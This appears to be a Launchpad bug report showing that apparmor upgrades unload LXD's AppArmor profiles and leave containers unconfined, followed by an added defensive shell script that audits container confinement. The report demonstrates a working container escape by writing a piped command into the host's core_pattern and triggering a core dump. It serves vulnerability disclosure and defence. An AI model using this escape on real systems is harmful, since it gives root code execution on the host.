Comment 0 for bug 1668892

Stéphane Graber (stgraber) wrote : apparmor package upgrades unload all LXD profiles

Apparmor package upgrades unload all LXD apparmor profiles, making all LXD containers unconfined.

Example:

# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2

# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)

stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)

# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...

# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined

# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$

# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit

stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned

This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981
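Added example (not part of the bug report and not LXD's own tooling): a small POSIX shell audit that automates the check the report performs by hand, reading /proc/<pid>/attr/current for every container's init process and flagging any that no longer carries an lxd-* profile in enforce mode, plus the count of lxd-* profiles loaded in the kernel. It assumes `lxc list -c n --format csv` and the `Pid:` line of `lxc info` as the way to find container init PIDs, and that the labels have the two shapes shown in the report (a leading `lxd-…` with an `(enforce)` suffix before the upgrade, a leading `unconfined` afterwards). The classifier is exercised on constructed copies of those labels so the file runs without LXD; pass --live to audit a real host.

```shell
#!/bin/sh
# Added example, not code from the bug report or from LXD: audit whether each
# running LXD container is still confined by its lxd-* AppArmor profile.
# Assumed interfaces: `lxc list -c n --format csv`, the "Pid:" line of
# `lxc info`, and the label shapes seen in /proc/<pid>/attr/current in the report.

# Classify one /proc/<pid>/attr/current label.
# Before the upgrade (report): "lxd-c1_</var/lib/lxd>//&:... (enforce)"
# After the upgrade (report):  "unconfined//&:lxd-c1_<var-lib-lxd>://unconfined"
# Prints one of: confined | complain | unconfined | unknown
lxd_confinement_state() {
    case "$1" in
        lxd-*" (enforce)")  echo "confined" ;;
        lxd-*" (complain)") echo "complain" ;;   # profile loaded but not enforcing
        unconfined*)        echo "unconfined" ;;
        *)                  echo "unknown" ;;
    esac
}

# Read "<container><TAB><label>" lines on stdin, print "<container><TAB><state>"
# for each one, and return 1 if any container is not confined.
audit_attr_lines() {
    bad=0
    tab=$(printf '\t')
    while IFS="$tab" read -r name label; do
        [ -n "$name" ] || continue
        state=$(lxd_confinement_state "$label")
        printf '%s\t%s\n' "$name" "$state"
        [ "$state" = "confined" ] || bad=1
    done
    return "$bad"
}

# Number of lxd-* profiles currently loaded in the kernel, i.e. the report's
# `ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd` check.
loaded_lxd_profile_count() {
    ls /sys/kernel/security/apparmor/policy/profiles/ 2>/dev/null | grep -c '^lxd-' || true
}

# Collect the live state of every container on this host and audit it.
audit_live_lxd() {
    echo "loaded lxd-* profiles: $(loaded_lxd_profile_count)"
    lxc list -c n --format csv | while read -r name; do
        pid=$(lxc info "$name" | awk '/^Pid:/ { print $2 }')
        # Stopped containers have no init PID; skip them.
        [ -n "$pid" ] && [ "$pid" != "0" ] || continue
        printf '%s\t%s\n' "$name" "$(cat "/proc/$pid/attr/current")"
    done | audit_attr_lines
}

# Only touch the live host when explicitly asked, so the functions above can
# be sourced or tested without LXD present.
if [ "${1:-}" = "--live" ]; then
    audit_live_lxd || { echo "WARNING: at least one container is running unconfined" >&2; exit 1; }
fi
```

Run it with --live right after any apparmor package upgrade (for instance from an apt post-invoke hook); a non-zero exit means at least one container lost its profile and is running unconfined, exactly the state the report shows.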